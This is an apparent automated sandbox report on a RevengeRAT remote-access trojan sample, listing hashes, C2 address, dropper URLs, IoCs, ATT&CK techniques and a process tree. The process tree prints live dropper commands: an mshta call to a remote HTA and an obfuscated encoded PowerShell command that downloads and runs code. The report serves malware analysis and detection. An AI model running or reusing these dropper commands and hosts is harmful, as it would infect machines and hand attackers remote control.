revengerat | 70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87

Analysis

max time kernel
4294211s
max time network
155s
platform
windows7_x64
resource
win7-20220311-en
submitted
15-03-2022 16:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe
Size

8.3MB
MD5

c25411c67aa30dbe53f157a411818426
SHA1

396ad9485cccba77f91a84b9d5b6356bb728d19b
SHA256

70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87
SHA512

ad36da1c23602299696e5a44d3a193ff8c29be2e73708bbbded6ae321da8de1dbdfd204279153eb19c7505a3c3f80a7334f85b261ac039c8e6153120ec096121

Score

10^/10

revengerat guest stealer trojan upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://www.minpic.de/k/b7d6/44dea/

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.minpic.de/k/b7d4/1jepll/

Extracted

Family

revengerat

Botnet

Guest

185.25.50.196:64537

Mutex

RV_MUTEX-pnFwUnoWrUUgHRH

Signatures

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

RevengeRat Executable 4 IoCs

stealer

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Cvnnc.exe	revengerat
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe	revengerat
\Users\Admin\AppData\Local\Temp\Cvnnc.exe	revengerat
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe	revengerat

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

5 572 mshta.exe
7 572 mshta.exe
8 1796 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Cvnnc.exeGrffqeoehyjfp.exe

pid process

1748 Cvnnc.exe
1236 Grffqeoehyjfp.exe

flow	pid	process
5	572	mshta.exe
7	572	mshta.exe
8	1796	powershell.exe

pid	process
1748	Cvnnc.exe
1236	Grffqeoehyjfp.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe	upx
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe	upx
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe	upx

Drops startup file 2 IoCs

Processes:

vbc.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Scheduler	vbc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Scheduler.exe	vbc.exe

Loads dropped DLL 3 IoCs

Processes:

70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe

pid	process
1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe
1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe
1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Grffqeoehyjfp.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Grffqeoehyjfp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Grffqeoehyjfp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Grffqeoehyjfp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Grffqeoehyjfp.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Grffqeoehyjfp.exe

pid process

1236 Grffqeoehyjfp.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exeGrffqeoehyjfp.exe

pid process

1796 powershell.exe
1236 Grffqeoehyjfp.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Grffqeoehyjfp.exe

pid process

1236 Grffqeoehyjfp.exe

pid	process
1796	powershell.exe
1236	Grffqeoehyjfp.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeGrffqeoehyjfp.exeCvnnc.exe

description	pid	process
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeBackupPrivilege	1236	Grffqeoehyjfp.exe
Token: SeRestorePrivilege	1236	Grffqeoehyjfp.exe
Token: SeDebugPrivilege	1236	Grffqeoehyjfp.exe
Token: SeDebugPrivilege	1748	Cvnnc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Grffqeoehyjfp.exe

pid process

1236 Grffqeoehyjfp.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

Grffqeoehyjfp.exe

pid	process
1236	Grffqeoehyjfp.exe
1236	Grffqeoehyjfp.exe
1236	Grffqeoehyjfp.exe
1236	Grffqeoehyjfp.exe
1236	Grffqeoehyjfp.exe
1236	Grffqeoehyjfp.exe
1236	Grffqeoehyjfp.exe
1236	Grffqeoehyjfp.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exemshta.exeCvnnc.exevbc.exe

description	pid	process	target process
PID 1924 wrote to memory of 572	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	mshta.exe
PID 1924 wrote to memory of 572	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	mshta.exe
PID 1924 wrote to memory of 572	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	mshta.exe
PID 1924 wrote to memory of 572	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	mshta.exe
PID 572 wrote to memory of 1796	572	mshta.exe	powershell.exe
PID 572 wrote to memory of 1796	572	mshta.exe	powershell.exe
PID 572 wrote to memory of 1796	572	mshta.exe	powershell.exe
PID 572 wrote to memory of 1796	572	mshta.exe	powershell.exe
PID 1924 wrote to memory of 1748	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Cvnnc.exe
PID 1924 wrote to memory of 1748	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Cvnnc.exe
PID 1924 wrote to memory of 1748	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Cvnnc.exe
PID 1924 wrote to memory of 1748	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Cvnnc.exe
PID 1924 wrote to memory of 1236	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Grffqeoehyjfp.exe
PID 1924 wrote to memory of 1236	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Grffqeoehyjfp.exe
PID 1924 wrote to memory of 1236	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Grffqeoehyjfp.exe
PID 1924 wrote to memory of 1236	1924	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Grffqeoehyjfp.exe
PID 1748 wrote to memory of 2032	1748	Cvnnc.exe	vbc.exe
PID 1748 wrote to memory of 2032	1748	Cvnnc.exe	vbc.exe
PID 1748 wrote to memory of 2032	1748	Cvnnc.exe	vbc.exe
PID 2032 wrote to memory of 832	2032	vbc.exe	cvtres.exe
PID 2032 wrote to memory of 832	2032	vbc.exe	cvtres.exe
PID 2032 wrote to memory of 832	2032	vbc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe
"C:\Users\Admin\AppData\Local\Temp\70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" https://www.minpic.de/k/b7d6/44dea/
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:572
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy unrestricted -windowstyle hidden -enc LgAgACAAIAAgACAAIAAoACAAIAAgACAAIAAgACAAJwBzAHYAJwAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACgAIAAgACAAIAAgACAAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGUAJwAsACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIAAgACAAIAAgACAAIAAgACAAJwBrAFgAJwAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACcAYQAnACAAIAAgACAAIAAgACAAIAApACwAJwAwACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAApACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAHQAeQBwAGUAXQAoACAAIAAgACAAIAAgACAAIAAgACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAE0AJwAsACgAIAAgACAAIAAgACAAIAAgACcAUABQAEQAJwAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAJwBvACcAIAAgACAAKQAgACAAIAAgACAAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAnAEEASQAnACAAIAAgACAAKwAgACAAIAAgACAAIAAgACcAbgAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkALAAnAGEAJwAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALgAgACAAIAAgACAAIAAgACAAIAAoACAAIAAgACAAIAAgACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJwBlAHQALQBWAEEAcgBJAEEAJwAsACcAYgBMAGUAJwAsACcAUwAnACAAIAAgACAAIAAgACAAIAApACAAIAAoACAAIAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwA3ACcALAAnAEYAWQAnACAAIAAgACAAIAAgACAAKQAgACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAdABZAFAARQBdACgAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAtAGYAJwBUACcALAAoACAAIAAgACAAIAAgACAAIAAgACcATgAnACAAIAAgACAAKwAgACAAIAAgACAAIAAgACcAdgBlAHIAJwAgACAAIAAgACAAIAAgACAAKQAgACAAKQAsACcAQwBvACcAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAIAA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAZQAwAGAASwBYAGEAfQA6ADoAIgBjAGAAVQBSAGAAUgBlAG4AVABkAG8ATQBgAEEASQBOACIALgAiAEwAbwBgAEEARAAiACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAuACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAHYAQQByAGkAYQBCAGwAZQAnACwAJwBnAEUAJwAsACcAdAAtACcAIAAgACAAIAAgACAAKQAgACAAKAAgACAAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcANwAnACwAJwBmAFkAJwAgACAAIAAgACAAIAAgACAAIAAgACkAIAAgAC0AdgBBAEwAVQAgACAAIAAgACAAIAAgACkAOgA6ACgAIAAgACAAIAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMwB9AHsAMgB9AHsAMAB9ACIALQBmACgAIAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACAAIAAgACAAIAAgACcAaQAnACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAJwBuAGcAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAApACwAJwB0AHIAJwAgACAAIAAgACAAIAAgACkALAAnAEYAJwAsACgAIAAgACAAIAAgACAAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAG0AYgAnACwAKAAgACAAIAAgACAAJwBlACcAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACcANgA0AFMAJwAgACAAIAAgACAAIAAgACkALAAnAGEAcwAnACAAIAAgACAAIAAgACAAKQAsACcAcgBvACcAIAAgACAAIAAgACAAIAAgACkALgAiAEkATgBWAGAAbwBrAGUAIgAoACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJgAgACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACgAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAtAGYAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAGIAagBlACcAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBjACcAIAAgACAAIAAgACAAIAAgACkALAAnAHQAJwAgACAAIAAgACAAIAAgACkALAAnAE4AZQAnACwAKAAgACAAIAAgACAAIAAgACAAIAAgACcAdwAnACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAgACcALQBPACcAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAAgACkAIAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AewA0AH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACgAIAAgACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAgAC0AZgAoACAAIAAgACAAIAAnAFMAJwAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAnAHkAcwAnACAAIAAgACAAIAApACwAJwB0ACcAIAAgACAAIAAgACAAIAAgACAAIAAgACkALAAoACAAIAAgACAAIAAgACAAIAAgACAAJwBlAG0AJwAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACcALgAnACAAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACAAIAAgACAAIAAgACAAJwBlAG4AJwAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAJwB0ACcAIAAgACAAIAAgACAAIAAgACAAIAApACwAJwBpACcAIAAgACAAIAAgACAAIAAgACAAIAAgACkALAAoACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIAAgACAAIAAgACAAIAAgACAAIAAnAFcAJwAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACcAZQBiACcAIAAgACAAIAAgACAAKQAsACcAQwBsACcAIAAgACAAIAAgACAAIAAgACAAKQAsACgAIAAgACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAE4AZQAnACwAJwB0AC4AJwAgACAAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAKQAuACgAIAAgACAAIAAgACAAIAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAoACAAIAAgACAAIAAgACAAIAAgACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBvACcALAAnAEQAbwAnACwAKAAgACAAIAAgACAAIAAgACcAdwBuACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAGwAJwAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBpACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACcAbgBnACcAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdAByACcALAAoACAAIAAgACAAIAAgACAAJwBhACcAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAJwBkAHMAJwAgACAAIAAgACAAKQAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAKQAuACIAaQBuAGAAVgBvAGsAZQAiACgAIAAgACAAIAAgACAAIAAgACAAIAAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBuAHAAaQBjAC4AZABlAC8AawAvAGIANwBkADQALwAxAGoAZQBwAGwAbAAvACcAIAAgACAAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAAgACAAIAApAC4AIgBFAE4AdABgAFIAYAB5AGAAUABPAGkAbgB0ACIALgAiAEkAYABOAFYATwBLAGUAIgAoACAAIAAgACAAIAAgACQAewBOAHUAYABsAGwAfQAsACQAewBuAHUAYABsAGwAfQAgACAAIAAgACAAIAAgACkA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1796
- C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe
  "C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hipqkhwm.cmdline"
    3⤵
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    PID:2032
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A39.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6A38.tmp"
      4⤵
      PID:832
- C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe
  "C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:1236

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scripting

T1064

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5
5039212678e2024408a27eda898eec1c

SHA1
f02086a8043f75f67196031412ec770fcb90ac46

SHA256
386e834800ae83f981da8d6ebe4c6f7c9b5165c13270660339322c119886207b

SHA512
bdfd4010b97f871268394c4338ae8d084797fabff2a8f0225b2045bd32a66d449eb53a9bb795c31ece60d264045f038f2d9625eccb08ce9406bc5b1f99e7cef6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe

MD5
72ef30dcd9957849920b70bba22ba753

SHA1
6767ec9b1a8f77a9ffb9883cffe2196b94971883

SHA256
930456009ff667ff95f11653868926de83ce4a6e133a0abf0fe8b36be58e1128

SHA512
d3c542fa72034e1edccb5d3ff8e72d5db8084783aa174b780a4636f7ace075432feeef30554db3da404a45d9ad9b829ce3f6c5beb9eff385ba394ca0d23581c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe

MD5
72ef30dcd9957849920b70bba22ba753

SHA1
